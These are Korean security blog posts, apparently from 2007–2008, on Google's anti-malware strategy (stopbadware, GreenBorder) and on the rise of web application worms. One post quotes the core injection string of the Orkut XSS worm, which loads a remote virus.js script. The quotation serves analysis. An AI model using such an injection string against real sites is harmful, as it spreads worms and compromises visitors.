태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.


구글이 2006년 부터 해온  stopbadware를 활용한 붉은색 경고 마크 정책을 변경 한단다. 정확하게는 변경이 아니라 다른 부가적인 서비스를 붙이는 것이지만..

왜 이럴까?. 악성코드 유포지로 확인된 사이트들에 대해 Alert 하는 정책으로는 지금과 같은 악성코드의 홍수를 막을 수 없기 때문이겠지. 당연히..

현재 Malware link를 찾거나 대응 할 수 있는 서비스는 여러개가 있지만 그중 가장 파워풀 한 것이 구글의 정책이다. ms와의 브라우저 전쟁이나 OS 전쟁에서도 이길 수 있는 ( 여긴 애플은 아직 애송이일 뿐) 방책이기도 하다. 그러나 DB 갱신이나 정보 확인 에는 시간이 걸린다. 아무리 빨라야 3일 정도.. 근데 3일이면 공격하는 자들은 또 바꾼다. 취약한 웹 서버는 어디에나 있기에..

2~3일에 한번씩 바뀌는 공격자들이 악성코드를 업로드 하거나 업로드된 경로로 유도하는 링크를 수도 없이 만들어 내고 이것을 취약한 웹 서비스들에 추가한다. 끝도 없이.

상상하기 힘든 위협이라고 몇 년전부터 이야기 해왔다. 이제 그 한계에 도달하고 있다.
전체 보안인력들이 대응 하기 힘든 한계에 도달하고 있으며 이 한계는 그들의 극한을 시험 할 것이다.

가장 많은 데이터를 가지고 있는 구글조차도 해결 하지 못하는 난제를 위해 그들은 자신들의 호스팅을 받을 것을 권한다. 구글의 관리자 도구를 활용하면 운영자가 추가하지 않은 링크들이 웹 서비스에 추가 될때 Alert을 해준다는 것이다. 문제는 다양하다. 매번 소스코드 변경이나 추가 혹은 링크를 통제 할때 마다 구글의 시험을 통과 해야 한다. 

또한 그 통과의 간극은 계속 지속 될 수 밖에 없다. 그리고 구글 관리자 도구를 계속 써야 하는 이유도 그렇고..
이게 과연 해결책이 될 수 있을까?  구글은 인터넷 전체를 통제 한다 하여도 불가능한 꿈을 꾸고 있다.

2~3일에 한번씩 발생 하는 Alert과 장기적으로는 차단으로 이어지는 상황이 된다면 이건 정상적인 인터넷을 향한 길이 아니다. 문제는 왜 그렇게 발생이 되고 재발이 되는지에 대한 근본적인 개선 노력이 병행 되어야만 가능하다.

아직 구글도 단순히 오프라인 상에서의 부분적인 점검만 가능한 도구를 오픈 했을뿐 다른 노력은 어디에도 없다.

그들이 못한 걸 다 가지고 있다. 3일의 간극을 넘을 수 있는 도구도.. 근본 문제를 해결 할 수 있는 도구와 서비스도 다 가지고 있다. 아직은 하룻강아지일 뿐이지만 ^^

이 것을 제어 하는자가 다음 전쟁의 주도권을 쥔다. 
일단 칼은 내 손안에 있다. 하하핫.
Posted by 바다란

바다란입니다.

 

지난해 초에 Web 2.0의 위협요소와 관련하여 여러 곳에서 발표를 한 내용이 있습니다. 그 PPT의 마지막장에 앞으로 다가올 위험요소들은 무엇이 있을까?에 대한 예상을 게재한 바 있습니다.

그 예상은 다음과 같습니다.

 

 

2007년 2월에 작성한 예상은 지금도 유효하며 향후에도 3~5년 가까이 유효한 예상입니다. 2006년 하반기에도 비슷한 이슈들이 있었으나 분석가들 대부분은 개별 기업의 문제로 치부하고 단편적인 이슈로 취급을 하였습니다. 세계적인 경우에도 비슷합니다. 국내의 경우에는 당연히 기사를 받아다 쓰는 경우 외에는 없었죠.

 

이 예상의 근거는 무엇인가 하면 취약성의 발견과 공격 기법의 변화, 파급효과에 따른 기대치에 따라서 예상이 되었습니다. 보다 많은 대상자에게 공격을 하는 패러다임의 전환기에서 일반 사용자 PC를 공격하기 위한 다양한 Bot 들이 출현 하였다면 이제는 보다 더 대상을 명확하게 규정하고 확실한 효과를 보기 위해서 Web Application worm을 이용한다는 변화가 심각하게 눈에 들어 왔기 때문입니다.

 

앞으로의 예상도 유사합니다.

보다 많은 대상자에게.. 보다 많은 유효한 대상에게 전파를 하고 확실한 효과를 얻기 위한 공격 기법은 계속 될 것이고 이 공격은 Cyber Black market이 존재하는한 ( 향후 몇 십년간 근절될 가능성은 없습니다. 인간의 기본적인 속성상..) 계속 될 수 밖에 없습니다.

 

Web을 통한 악성코드의 유포의 경우에도 일반적으로 국내와 최근의 해외의 경우에는 특정 게임의 계정을 탈취하기 위한 공격들이 많았습니다. 특정 게임의 유저들이 자주 방문하는 사이트를 공격하는 경우가 일반적이였으며 이제는 전체의 대상자를 겨냥한 사이트 공격이 일반화 되어 있습니다. 

 

악성코드의 두 가지 흐름은 Application Attack 관점에서 두 가지 방향으로 볼 수 있습니다. 하나는 위에 언급한 악성코드 유포를 위한 관련성 있는 Web site에 대한 직접적인 공격 ( Application의 Perimeter validation error 부분을 공격 - ex : sql injection, Cross Site Scripting)을 통한 방문자 PC 악성코드 전파 사례와 또 다른 하나는 직접적인 Service 구조를 공격하는 Application Attack이 있을 수 있습니다.

 

첫번째 케이스는 이미 이 블로그에서도 상당부분 지적한 바 있으며 Service에 특화된 공격들도 예를 든 적이 있습니다. Yahoo Messenger에 대한 공격, Myspace에 대한 악성코드 Attack들이 있으며 지난해 12월에 발생된 Google의 orkut ( SNS) 사이트에 대한 공격이 특별한 예가 될 수 있습니다.

 

Orkut에 대한 공격은 하기의 링크를 참조 하시면 일정 수준의 정보를 얻을 수 있습니다.

 

http://www.news.com/8301-10784_3-9836029-7.html?tag=nefd.only

http://www.cgisecurity.com/2007/12/17

 

source code & analysis

 

http://www.marrowbones.com/commons/technosocial/2007/12/orkut_worm_code_and_why_was_go.html
http://ha.ckers.org/blog/20071220/orkut-xss-worm/

 

위와 같이 정보의 확인이 가능합니다. 위의 기사에서 언급 되었듯이 40만명 가까운 유저에게 짧은 시간동안에 Worm이 퍼지는 것을 확인 할 수 있습니다. 관계로 이루어 지는 모든 SNS 사이트들은 동일한 구조를 지닐 수 밖에 없으며 문제를 가지고 있습니다. 이제는 Web을 통한 연결이 일반화 되고 다양한 연결 도구들을 활용 하여 ( AJAX, RSS , ATOM ...) 연결이 이루어짐으로 인해 피해는 특정 서비스에 한정된 모든 사용자들에게 전파가 됩니다.

 

orkut worm에서의 중요 코드는 다음과 같습니다.

"[/silver]<br/><embed src=\"http://www.orkut.com/LoL.aspx\" type=\"application/x-shockwave-flash\" wmode=\"transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape('\"width=\"1\" height=\"1\"></embed>";

 

위의 코드에서 중요한 부분은 사이트 실행시에 전달되는 인자 값에 script가 실행되는 문제가 모든 문제의 시작이라 할 수 있습니다. 전달 되는 인자값에 스크립트가 실행됨으로 인해 스크립트 내의 소스코드들은 orkut의 Friend list를 가져오고 전파하는 유형의 코드들을 볼 수 가 있습니다.  ( 상세 내용은 위에 언급한 URL 내의 소스코드를 일부 분석해 보시면 연관관계 파악이 가능합니다.)

 

지난해 초에 제시한 Next Threat의 특징들에 제시된 내용과 동일함을 볼 수 있습니다.

 

Application Web service worm 이며 특정 서비스에만 국한된 국지적인 영향 ( Google의 orkut) , Ubiquitous Attack ( 유,무선 사용자들에게 동일한 영향을 미침), 더불어 플랫폼에도 국한되지 않는 공격입니다.

대안으로는 여러번 언급 하였으나 모든 Application에 대한 사용자 접근 지점에 대한 Validation check의 일반화 , 사고 발생 이후의 빠르고 역동적인 대응만이 해결책입니다. 이 부분을 처리 하기 위해서는 수준높은 전문가의 활용과 서비스에 익숙한 보안 전문가들의 확보가 필수적입니다. 세계적인 기업들에 Application security 전문가들의 자리는 앞으로도 많이 비어 있을 수 밖에 없습니다. 그만큼 기회도 많고 Risk도 높다는 이야기 입니다. 국내라고 예외 이겠습니까?...

 

많은 IT 서비스 기업들이 보다 더 사용자 접근성을 강화하고 활발하게 하도록 구성이 되고 있는 지금 시점에 해외보다 더 많은 위험들이 존재한다고 볼 수 있습니다. 단지 공격에 대한 기대 효과가 있느냐 하는 가치의 문제 때문에 시도가 되지 않는 것이죠. 일부 대규모 IT 서비스 업체에서는 알게 모르게 Service에 특화된 Attack들이 다수 있었을 것입니다. ( 부정 할 수 있는 서비스 업체가 어디 일까요? )

 

왜 이런 유형들이 발생되고 있고 향후에는 어떻게 될 것인지에 대해서 인지하는 것은 중요합니다. 그러나 그 어느 누구도 중요성을 언급하지 않습니다. 05년 부터 중국발 해킹의 위험성과 파괴력에 대해서 언급 하였으나 세계적인 흐름은 07년에 들어서야 가까스로 피해를 입고 인지하는 수준으로 전달이 되고 있습니다. 그만큼 국내의 환경은 빠르고도 역동적인 기회를 부여합니다. ( 보안전문가들에게..) 더불어 그만큼 가혹한 노력을 요구하는 환경입니다.

 

앞으로의 방향성에 대해서 고민하지 않는 전문가. 생각조차 하지 않는 전문가들은 가치가 없습니다.

치열하게 고민해야 됩니다.

 

 

특화된 Service Attack은 계속 발전할 것이고 사용자 연결 지점의 사소한 문제들도 이제는 전체의 서비스에 영향을 미치는 거대 사안이 될 수 있습니다. 그만큼 중요도가 높아 진다는 것이죠.

변화를 따라 갈 것이냐 리딩 할 것이냐는 마음먹기에 따라 달린 것입니다.

 

올해도 또 이렇게 시작합니다.  앞으로도 많은 관심과 질책을 아낌 없이 주셨으면 합니다. 지난 한해 감사했습니다.

 

- p4ssion is never fade away . 바다란

 

 

 

 

Posted by 바다란
 

 

이제서야 처음 언급한 전략이 나오네요. 전략이라고 해봐야 별 거 없습니다.

뭐 특별하고 신출귀몰한 것도 없고 어느 정도 수준 되면 다 보이는 정도입니다. 이런 흐름을 얼마나 역동적으로 리딩을 하고 끌고 가느냐가 생존을 담보 하겠죠. 앞으로의 세상은 더더욱 그럴 것 입니다. 안주하는 서비스기업들은 무너지겠죠. 한 순간에 녹아 내리듯이 그렇게..

힘겹고 고통스러운 일이지만 그 동안 외면 했던 Security 라는 측면을 하지 않으면 생존하기 힘든 상황이 될 것입니다. 눈에 보이는 것이 아닌 체질적으로 서비스에 내재된 기술적 보안역량이 서비스의 질에 매우 큰 차이를 가져오게 될 것입니다. 앞으로는 보유 여부에 따라 극복하기 힘든 절대적인 차이가 발생하게 될 것입니다.

 

 

 

보안전문가와 보안 관리자의 차이( http://blog.naver.com/p4ssion/50014996901 ) 에서 언급한 GSM (General security manager ) SSM (Special Security manager) 의 구분과 동일합니다. GSM이 아닌 SSM의 보유여부에 따라 향후의 IT 서비스 기업의 흥망성쇠는 달라집니다. 최소한 글로벌 비즈니스를 하는 곳은 그러 합니다.  단지 인력을 확보 하고만 있는 것이 아닌 역량 발휘가 가능한 환경까지도 조성이 되어야만 하는 문제입니다. 국내의 현실은 SSM보다는 GSM이 더 우대 받는 현실이지만 앞으로의 다가올 위협에 뼈저리게 느낄 기회가 주어지게 될 것입니다. 위협에 대한 대응에 있어서 국내에서는 유야무야 얼버무리는 것이 된다 하여도 해외사업에서는 절대 그렇게 되지 않을 것입니다. 그때 가서야 알게 될 것입니다. 후회해도 늦었지만.. (하고 싶은 말들은 있습니다만. 이런 내용은 사설로 나중에  더 가슴에 맺히면 쓰도록 하겠습니다. 꾸벅)

 

1. Google online security 전략 개요

http://blog.naver.com/p4ssion/50019586109

 

2. online security 전략 상세  - * Trustworthy web

                                    * Google security strategy

3. online security의 방향과 미래 ??

 

* Google의 전략

 

- Direction : Passive protection ->Active protection으로의 전환

 

개념상으로 단순한 바이러스의 제거  ( 발생 이후에 제거가 가능한 부분) 서비스의 제공에서 벗어나 올해부터는 본격적으로 Active한 보호를 가능케 하도록 서비스 틀이 변화 될 것을 예상 할 수 있습니다. 1~2년 후에 일반화된 경향이 될 것으로 예측 됩니다.

Active한 보호 방안이란 사용자의 선택에 따른 AV 서비스의 제공이 아닌 악성코드 감염을 원천 차단하고 악성코드 유포 사이트에 대한 사전대응 형식으로 사용자에게 노출되는 악성코드를 적극적으로 줄이겠다는 의사로 풀이가 됩니다.

 

서비스적인 측면에서 Passive Active Protection 두 방안의 조화로운 운영을 통해 문제 발생 부분을 최소화 할 것으로 보이며 프로세스상으로는 다음과 같은 일련의 체제를 갖출 것 같습니다.

 

Active (예방 ) - Passive (대응) - Response ( 관리)

 

Active :

GreenBorder Product를 통한 악성코드 감염의 원천방지 ( 전체 사용은 어려울 것으로 예상)

일부 구글팩 및 구글툴바를 활용한 사용자 선택적인 사용이 중점이 될 것으로 예상됨

 

Passive:

구글팩에 포함된 Symantec AV 백신을 통한 사용자 치료 서비스의 강화 , 향후 다양한 멀티 벤더 제품을 사용하도록 할 가능성이 있음.

 

Response:

Stopbadware.org 사이트 운영을 통한 악성코드 유포 가능성을 지닌 사이트의 검색 결과 격리

stopbadware.org 사이트에 등록이 되는 사이트들은 AV벤더와 협력하여 탐지가 되는 결과를 가지고 진행합니다. 한국의 경우에는 KISA와의 협력을 통한 악성코드 유포 사이트 정보를 활용하여 stopbadware.org 사이트에 등록을 하게 될 것으로 보입니다.

 

위와 같이 세가지 방향에서의 online security가 이루어 지고 있으며 움직임이 본격화 되었다는 것은 security라는 측면이 online business에서 얼마나 중요한 가치를 지닐 수 있는지를 인지했다고 볼 수 있습니다. 내부 보안 강화 및 서비스의 보안 강화의 측면에서 한층 더 나아가 user 단위에 까지 영향을 미치는 security가 가미된 서비스로 방향을 설정한 것이라 봅니다. 그리고 현재의 위협 상황에서는 사용자까지도 보호를 해야만 서비스의 안정성이 유지가 되는 것이 사실입니다.

 

기본개념으로는 secure search search integrity (security 측면에서의 무결성- 악성코드로부터 Free..)으로 흐름분석이 가능 한데 일련의 이슈들을  서술 하면 다음과 같습니다.

 

 

Secure search & Browsing

 

secure search라는 부분은 제가 해석한 부분입니다. 대표적인 예로 올해 상반기에 인수된 Greenborder를 예로 들 수 있습니다. 전편에서 언급 하였듯이 검색 서비스 자체의 보안 측면은 아닙니다. 검색을 통해 노출된 사이트들을 통해 사용자가 피해를 입는 부분을 최소화 하자는 것이 근본 방향이 될 것으로 보입니다. Google을 통해 검색을 하고 그 결과를 클릭 하였는데 악성코드에 감염이 되었다는 문제 제기를 피하기 위한 방안으로 인식이 됩니다.

이 움직임은 올해 초에 구글의 Anti malware 팀에서 조사한 내용을 통해 근본 근거를 마련하고 이후의 Action item으로 Greenborder의 인수를 추진한 것으로 확인이 됩니다.  조사되고 발표된 내용은 전체 검색 결과의 10%가 악성코드 및 위험요소를 가지고 있는 유형으로 파악되었다는 자체 조사 결과 입니다.

 

Greenborder에 대한 설명은 전편에 설명을 하였지만 부가적으로 더 언급을 하면 Secure Browsing을 구글 내에서는 가능하게 하겠다는 근본취지를 지니고 있는 개념으로 볼 수 있습니다.  구글을 통해 검색이된 결과는 사용자가 클릭을 하여 해당 사이트로 이동을 하여도 악성코드에 감염되지 않는 Frame을 만들겠다는 관점에서 볼 수 있습니다.

 

대부분의 웹사이트를 방문할 경우 해당 사이트의 컨텐츠들은 사용자 PC의 임시파일 저장소에 저장이 되어 (cache ) 사용자의 브라우저 화면에 보여지게 됩니다. 대부분의 악성코드들이 감염 시키는 방식이 다운로드 이후 실행을 하는 방식을 취하고 있는데 GreenBorder의 경우에는 이 공간을 격리 시킵니다.

격리라는 의미는 별개의 가상공간에서 다운로드를 받고 사용자의 Browser에 보여지게 한 뒤에 사용자가 해당 사이트 이탈 시에는 가상공간을 없애는 유형으로 악성코드가 사용자 PC에 직접 침입 하는 유형을 원천 차단하는 것을 의미합니다.

 

개념 상으로는 좋은 방향이지만 국내의 현실에서는 문제가 많을 것으로 보이며 문제는 다수 발생 할 것으로 보입니다.

ActiveX 또는 부가 설치가 필요한 모든 부분에 대해 예외 설정 등을 하게 되면 문제는 계속 될 것으로 보이며 향후 구글 툴바 혹은 구글팩에 포함되어 사용자의 선택에 의해 사용하게 되는 유형으로 서비스 될 것으로 예상됩니다.

 

7.11일 현재 구글은 postini 라는 이메일 보안 업체를 6000억원을 주고 인수 합병을 하기로 한 기사가 나왔습니다. 관련 업체의 프로필을 살펴본 결과 기업용 제품으로서 단순한 이메일 보안업체가 아닌 일관된 Policy의 적용 및 내부 정보 유출을 방지하는 서비스 유형으로 파악이 되며 Google의 서비스 측면에서 보았을때 향후 기업용 시장에 대한 진출 도구로서 활용이 되고 Gmail에 대한 서비스 강화, 이익 강화 ( 미국의 3대 이메일 보안 서비스 업체라고 함) 측면에서 보는 것이 바람직해 보입니다.

 

 

Search integrity

 

검색결과에 대한 무결성을 보장한다는 의미는 검색 관련된 서비스를 하는 업체에게는 매우 중요한 factor 입니다. 그동안의 무결성이 검색 결과에 대한 정확도의 측면에서 접근 하였다면 지금은 전체적인 Web상의 위험요소 발달에 따라 다른 부분으로 전이가 되고 있습니다.

 

검색결과에 대한 정확도 측면 + 검색결과에 대한 신뢰도 ( 신뢰도 측면은 사용자 PC에 대한 안정성 측면의 신뢰도 입니다.) 가 이제는 기본적인 흐름으로 대두 될 것입니다. 이런 연유에 따라 구글의 Anti malware 팀에서는 구글 검색 결과 중 10%가 악성코드 유포의 위험성이 있다고 스스로 발표를 한 것으로 볼 수 있습니다. 스스로가 발표를 하면서 위험성이 있다는 것도 사용자들에게 알리고 이런 위험성을 제거하기 위해 사용자의 Action을 제한 할 수 있는 서비스를 출시 하는 것으로 볼 수 있습니다.

 

사용자의 Action 제한을 하더라도 큰 범주에서는 사용자의 보호를 위한다는 당위성 확보로 적절하게 활용이 된 것을 볼 수 있습니다.  구글 서비스에서 이루어지는 빠른 변화에 대한 사전작업이라고 보입니다.

 

Search integrity를 확보하기 위해서는 무엇을 하는가? 하는 측면에서 바라보면 드러난 부분으로는 다음과 같습니다.

Stopbadware.org 사이트의 활용 - 하버드 법대에서 운영을 하도록 합니다.  AV 벤더 및 악성코드 유포를 탐지하는 여러 업체 및 기관과 협력하여 거의 실시간에 가깝게 악성코드가 유포되고 있는 사이트 정보를 획득하고 해당 사이트 정보를 구글의 검색 결과에 반영을 합니다. Black list에 등재된 사이트의 경우 검색 결과에 노출이 되어도 사용자가 클릭을 하면 악성코드 유포 위험성 안내와 함께 stopbadware.org 사이트로 이동을 하도록 하고 있습니다.  관련 업체에서 이의제기를 하고 싶어도 구글 에게 직접 하는 것이 아닌 하버드법대에 이의제기를 해야죠.  blacklist에서 제거 되는 부분도 악성코드 유포 위험요소를 제거한 이후에 되도록 되어 있고 black list에서 제거되면 검색결과는 정상적으로 해당 사이트 링크를 활성화 시켜 줍니다.

 

주변 환경을 이용하는 측면에서 영악하다고도 볼 수 있는데 구글의 정보통제 및 독점에 대한 문제 회피를 위해 하버드 법대를 활용한 개념이 있고 또한 거의 실시간에 가까운 전 세계 협력 기관 및 AV 벤더의 자료를 취합해 적용함으로써 신뢰도를 높이는 점이 있을 것 같습니다. 자료를 제공해주는 기관이나 벤더는 향후 대폭 확대될 가능성이 있을 것이며 확대에 따라 신뢰도는 더 높아지는 결과를 유발 할 것입니다. 2007.7.11자로 확인을 해보니 악성코드 유포 가능성이 있고 유포중인 사이트가 197000여 개 정도 리스트업이 되어 있습니다.  

( http:://www.stopbadware.org )

우리나라의 경우에는 KISA에서 제공되는 악성코드 유포 사이트 정보를 활용하여 보다 전문적이고 지역적으로 특화된 내용에 대해서도 대응이 가능한 체제를 수립하려는 것으로 보입니다.

 

Response 영역에 대해서는 특별히 언급할 내용이 없으며 구글팩의 설치부터 AV 백신의 실행까지 모두 사용자 동의 하에 가능한 부분이라 영향은 제한적이지만 향후에는 위협의 증가에 따라 기본으로 제공될 가능성이 존재합니다.

 

 

Integrity Secure search & browsing에 대한 간략한 개념을 설명 드렸습니다.

 

영향은 어떻게 될까요? 짧은 소견이지만 생각 나는 대로 정리 하겠습니다.

 

Google의 검색 안정성 강화 ( 이익 창출을 위한 필수도구로서의 security factor 인식의 산물)

Active , Passive , Response process를 통한 전방위적인 대응체제 수립이 가능할 것으로 보이고 각각의 영향력이 다름으로 인해 효과는 제한적이나 향후 1~2년 이내에 Frame화 되어 정착될 가능성이 높습니다.

 

Active method (Green border technology)의 활용은 제한적이 될 가능성이 높고 위에 언급 하였듯이 Toolbar 혹은 별도의 Plugin 형식으로 전파가 되고 사용자의 선택에 따라 활용하는 용도로 이용될 가능성 있습니다.  단점으로는 언급 하였듯이 전체적인 보안기술의 적용이 어렵습니다. 특히 국내의 경우에는 많은 사이트들에 장애를 일으키거나 정상적인 접근이 어려워 지는 경우가 발생될 것으로 예상됩니다. 사용자의 설정 요구가 매우 많아져서 오히려 사용자를 떨어지게 할 수도 있을 것 같네요.

 

구글은 사용자의 요구와 Security의 강화라는 측면에서 Web 상에서 노출되는 많은 위험들을 앞으로 적극적으로 강조할 것으로 보입니다. 분명한 사실이지만 비지니스적으로는 강조해야만 불편함에 대한 사용자의 요구를 일소 할 수 있는 명분이 생기는 것이겠죠.  

Passive Response에 해당하는 이슈들은 앞으로 많은 영향을 미칠 것으로 보이며 특히 AV벤더와의 협력관계 확대를 통한 Response 영역의 확장은 노하우가 쌓일 수록 강한 힘을 발휘 할 것 같습니다.

 

글을 쓰는 목적은 변화하는 흐름을 분석하고 이해해서 향후 방향 설정에 도움이 되었으면 하는 마음에 분석한 것이며 그 과정에서 최근 구글의 행동이 주목할 만 하여 케이스 스터디 차원일 뿐입니다.

 

감사합니다.

 

* 심각하게 고민한 내용이 아니고 그 동안 나온 기사를 바탕으로 생각나는 대로 나열한 부분입니다. 내용 중에 이해가 어려운 부분도 있을 수 있습니다. 이 부분은 설명하는 사람의 무지를 탓하시면 될 것 같습니다. 또한 내용 중에 정확하지 않은 내용도 있을 수 있습니다.  신문기사만 보고 판단한 것이라 다른 내용들이 있을 수 있습니다. 개인적으로 보는 관점이라고 봐주시면 감사하겠습니다.  재주가 없어서 그런지 이해한 내용을 전달 하는 것도 부족한 부분이 많습니다.

 

- 사족 나갑니다.

왜 국내 IT Service 기업들은 변화를 리딩 하지 못할까요?  IT Service에서 안주와 자리 지키기는 죽음에 이르는 길입니다. 죽음의 길에 조금 더 빨리 가도록 하는 것이 학벌과 지연과 인맥에 의한 것이겠죠. 특히 Global Service기업이라면 학벌, 지연, 인맥에 의존 하는 순간 초고속 급행열차로 죽음의 길에 가는 것과 다름 없습니다. 남의 떡이 커 보인다고 키워야 될 자기 것들을 팽개치고 이러다 보면 순식간에 무너지겠죠. 전문직무분야인 보안 분야에서도 그러한데 다른 분야는 오죽하겠습니까? ^^; 위험을 인지 하지도 못한다면 더 심각한 상황이라 할 수 있습니다. 매 순간이 위기인데 말입니다. 백척간두 진일보라는 말은 개인에게만 해당되는 말은 아닙니다. 지금 이 순간의 모든 IT서비스기업들에 해당이 되는 의미입니다. 당장 1년 뒤를 보장할 그 어떠한 것도 없습니다. 세계와의 경쟁에는 학벌과 인맥, 지연이 통하지 않습니다. 그리고 지금의 서비스는 이미 세계와 경쟁 중입니다. 4천만의 시장으로 먹고 살 수 있다고 생각하는 고만고만한 기업이라면 이름 없이 사라짐을 당연하게 알아야 될 것입니다. 아쉽게도 문제는 그런 기업들이 너무 많다는 것이 문제일 뿐입니다. 아쉽지만 여기까지 인 것 같습니다.


 
Posted by 바다란
 

 

바다란 입니다.

 

현재의 인터넷 환경을 주도하고 있는 화두업체인 구글에 있어서 Online security는 어떤 의미인지 이 시점에서 짚어 보는 것이 필요하다고 생각 됩니다.

전체적인 맥락에서 한번 짚어볼 부분은 반드시 있을 것 같아서 이전 Thread에서 약속한 것과 같이 3가지 Article로 정리를 하도록 하겠습니다.

 

1. Google online security 전략 개요

http://blog.naver.com/p4ssion/50019586109

 

2. online security 전략 상세  - * Trustworthy web

                                    * Google online security strategy

3. online security의 방향과 미래

 

오늘은 2번 항목을 정리해 보도록 하겠습니다. 지난 issue 부분에서 논의된 내용을 체계적으로 구성을 하여 향후 방향에 대한 예측 부분으로 정리를 하겠습니다. 3번 항목은 미정입니다.

 

Google Online security 전략은 사실 오래 되지 않은 부분입니다. 그 동안은 자사의 서비스 시스템에 대한 안정화와 Process 강화와 관련된 부분이 가장 컸을 것으로 예상 하고 있습니다. 실상 여타 포털과 비교해서 Contents 제휴 종류와 범위로 따지면 비교도 되지 않는 (?) 구글입니다. 검색 전문업체로 시작하였기에 일면 국내에서 통용되는 포털이라는 개념과는 조금 다른 관점에 있습니다.  내부에서 개발된 Application에 대한 검증도 실시간으로 세계적인 이슈가 통용 되고 있는 보안 부분에 대해 받는 위험도와 압력은 IT 서비스 업체 모두가 해당이 됩니다.  IT 서비스업체나 Google이나 모든 웹서비스 업체는 보안에 대해 실시간으로 동일한 위험과 동일한 압력을 받고 있다고 할 수 있습니다.

 

왜 이런 위험요소들이 도출이 되고 행동들이 있는지는 전체적인 Attack trend를 살펴야만 가능합니다. 현재의 Trend는 다음과 같이 단편화 시킬 수 있습니다.

 

 

 

2005년부터 나타나기 시작한 Application에 대한 공격은 Web의 일반화와 궤를 같이 하고 있습니다. Web service의 활성화와 일반화에 따라 개발되는 모든 Application들이 Web을 통한 연결을 기본으로 하고 있습니다. 일반 C/S 환경에서 활성화 되는 Application의 수는 대폭 줄어들고 있다고 볼 수 있습니다. 아마도 일부 특수한 환경에서 사용되는 Application을 제외하고는 web 연결이 필수적인 Application이 대부분으로 예상이 됩니다. 

Web Application의 출현과 더불어 공격이 출현하게 되고 이전의 운영체제의 취약성을 노리는 직접 공격에서 운영체제 위에 설치 되고 운영이 되는 Web application에 대한 직접 공격이 증가하게 됩니다. 또한 이런 Application에 대한 공격은 자동화된 경향을 나타내며 발전하고 있습니다.

 

특정 서비스에만 특화된 Application attack의 출현도 일반적인 현상이라 할 수 있습니다.  (관련 내용은 올해 들어 여러 곳에 발표를 한 Web 2.0 관련 위험요소라는 PPT를 적당한 시점에 공개토록 하겠습니다. )

 

Web application에 대한 공격이 증가 한다고 하였습니다. 그럼 이런 공격 유형과 기업들의 변화된 움직임은 왜 일까요?. 그 변화에 대한 답은 제가 생각하기에는 다음과 같은 환경의 변화로 인해 기인 합니다.

 

위의 항목에서 보시면 각각의 서비스 기업들의 변화와 보안상의 위험요소와의 연관 관계를 추산할 수 있습니다. 제가 나누는 관점에서는 Worm의 출현에 따라 기업들의 대응과 보호 방안들이 달라지고 있다고 판단 하고 있습니다.

최초에는 Worm의 출현 -> Worm의 일반화 -> Web attack의 출현 -> Web을 통한 무차별적인 악성코드의 유포와 개인정보 도용 이런 유형으로 나눌 수 있으며 그에 따른 기업들의 대책들이 달라지고 있다고 볼 수 있습니다.

 

물론 공격유형이 변화는 사회적인 변화와도 궤를 같이 하고 있으며 세계에서 가장 빨리 위협을 경험한 곳이 대한민국이지만 향후에는 좀 더 다른 양상을 보일 수 있습니다. 개인정보를 유출 하기 위한 악성코드의 출현과 무방비로 노출된 사용자의 PC에 대한 문제는 이제는 IT 서비스를 진행하는 업체 모두에게 위험요소가 되고 있습니다.

직접적인 서비스 공격에 대한 대비도 하여야 하며 또한 서비스를 이용하는 사용자들에 대한 보호 대책도 강구 하여야 합니다. 해외는 이제 사용자들에 대한 보호 대책들이 출현하고 있는 시점이라 할 수 있습니다.

 

이른바 주가는 경기에 선행 한다고 합니다. 경기의 활성화를 미리 가늠 할 수 있는 요소가 주가 지수라는 의미인데 다른 비유를 하자면 Internet Industry의 위험요소를 가장 먼저 경험한 곳이 대한민국이고 그 위험요소가 이제 전체로 전이가 되고 있는 것으로 볼 수 있습니다. 해외 유수 IT 서비스 기업들의 움직임이 그러합니다. 적당한 비유가 생각 나지 않아 가져다 붙였습니다. ,

그 위험요소는 Web에 대한 공격이고 이런 공격들은 2005년부터 국내에 본격화 되었으며 악성코드에 대한 피해도 본격화 되었다고 볼 수 있는데 이런 위험에 대한 인식은 해외 업체들의 경우 인식에 대한 시기 자체가 조금 늦게 시작 되었습니다만 보다 더 꾸준하고 큰 영향력을 미치는 방향으로 이루어 진다는 점에 대해 주목하여야 합니다.

 

소통의 도구로 일반화 되고 향후에도 1분 이내에 전 세계와 소통 할 수 있는 Web의 발달은 더욱 가속화 될 것이고 생활과 더 밀접하게 연관이 있게 될 것입니다. 전 세계 어디에서나 글을 올리고 1분 이내에 접근 할 수 있다면 Web을 통한 모든 위험요소들의 전파도 1분 이내에 전 세계에 영향을 미칠 수 있다는 것과 동일합니다.

 

그만큼 Trustworthy web의 구현은 필수적인 요소가 될 것 입니다.

이런 요소의 중요성에 대해 인식하지 못하는 많은 서비스 업체들은 시행 착오 및  곤란을 다수 겪게 될 것이고 도중에 무너지는 경우도 종종 발생하게 될 것입니다.

지금 까지는 아니지만 앞으로 더 심각해 질 것이라는 것입니다.

 

신뢰할 만한 웹을 만들어야 된다는 것은 이제 서비스 업체들의 지상목표가 될 것이고 많은 노력이 필요하게 될 것입니다. 여기 전 세계 유명 기업들의 신뢰할 만한 웹을 위한 노력을 조금 살펴 볼 수 있는 요소가 있습니다.

 

아래의 Article Cnet.com에서 "웹보안의 미래"라는 제목으로 주요 기업을 인터뷰한 기사입니다. 참고 삼아.. – 본 인터뷰 기사를 통해서도 내부 프로세스의 흐름을 일부 예측 하는 것은 가능합니다. 이 내용은 조만간  (언제나 그랬듯이 쓰고자 하는 의지가 생기면 바로 씁니다.)

 

http://www.zdnet.co.kr/news/internet/search/0,39031339,39158840,00.htm  구글의 치열하고 즐거운 보안 노력

http://www.zdnet.co.kr/news/internet/search/0,39031339,39158918,00.htm   야후 보안, '편집증 환자들'

http://www.zdnet.co.kr/news/internet/etc/0,39031281,39159098,00.htm  MS 데스크톱의 경험을 살리다.

 

* 위의 인터뷰를 보시면 아시겠지만 기술적인 보안이 온라인 서비스 기업에 대해 중요한 영향을 미치고 있음을 알 수 있습니다.  MS는 그 관점에서 보면 아직 갈 길이 많이 남았다고 할 수 있습니다.

 

